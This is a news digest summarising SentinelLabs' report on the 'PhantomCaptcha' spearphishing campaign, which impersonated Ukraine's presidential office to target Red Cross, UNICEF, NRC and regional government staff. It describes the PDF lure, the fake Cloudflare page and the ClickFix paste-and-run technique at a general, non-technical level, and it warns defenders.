‘PhantomCaptcha’ hackers impersonate Ukrainian president’s office in attack on war relief workers

Steven

‘PhantomCaptcha’ hackers impersonate Ukrainian president’s office in attack on war relief workers

Summary

Cybersecurity researchers at SentinelLabs uncovered a carefully planned spearphishing campaign, tracked as “PhantomCaptcha,” that impersonated the Office of the President of Ukraine and targeted individuals at humanitarian organisations on 8 October. Victims included members of the International Committee of the Red Cross, the Norwegian Refugee Council, UNICEF and several Ukrainian regional administrations.

The attackers used an eight-page weaponised PDF that redirected victims to a fake Cloudflare DDoS gateway hosted on a server tied to Russian provider KVMKA. The lure offered two compromise paths: connect to a password-protected Zoom meeting (allowing live social engineering), or follow a “ClickFix” / “Paste and Run” trick that persuaded Windows users to paste a token into a Run dialog, thereby executing a PowerShell payload.

SentinelLabs found evidence of six months’ preparatory work and compartmentalised infrastructure. Although the public-facing domains went offline the same day, backend command-and-control components persisted and a similar domain was registered the next day, suggesting potential continued operations. Researchers also noted possible links to a broader campaign using adult-entertainment lures and APKs, with tentative ties to Russia/Belarus development sources. Attribution remains unconfirmed.

Key Points

  • The PhantomCaptcha spearphishing campaign impersonated Ukraine’s presidential office and targeted humanitarian and regional government contacts on 8 October.
  • Attackers used weaponised PDFs that redirected victims to a fake Cloudflare DDoS page hosted on a server associated with provider KVMKA.
  • Two compromise vectors were possible: a staged Zoom call for live social engineering, or a “Paste and Run” PowerShell execution (ClickFix) that bypasses file-based endpoint defences.
  • Infrastructure shows six months of preparation, strong compartmentalisation and rapid takedown of public lures, but some backend C2 remained active afterwards.
  • Researchers flagged a related cluster using adult-entertainment lures and an APK; possible links to Russia/Belarus development were noted but not confirmed.

Why should I read this?

Short answer: because this isn’t just another phishing email. Aid groups and regional admins supporting Ukraine were specifically targeted with a clever paste-and-run trick and fake conferencing lures — techniques that get users to run malicious code themselves and dodge many usual defences. If you work in humanitarian ops, IT security for NGOs, or handle sensitive coordination for Ukraine relief, this story tells you exactly what to look out for so you can stop it before it hits your people.

Source

Source: https://therecord.media/phantomcaptcha-spearphishing-campaign-ukraine-war-relief-groups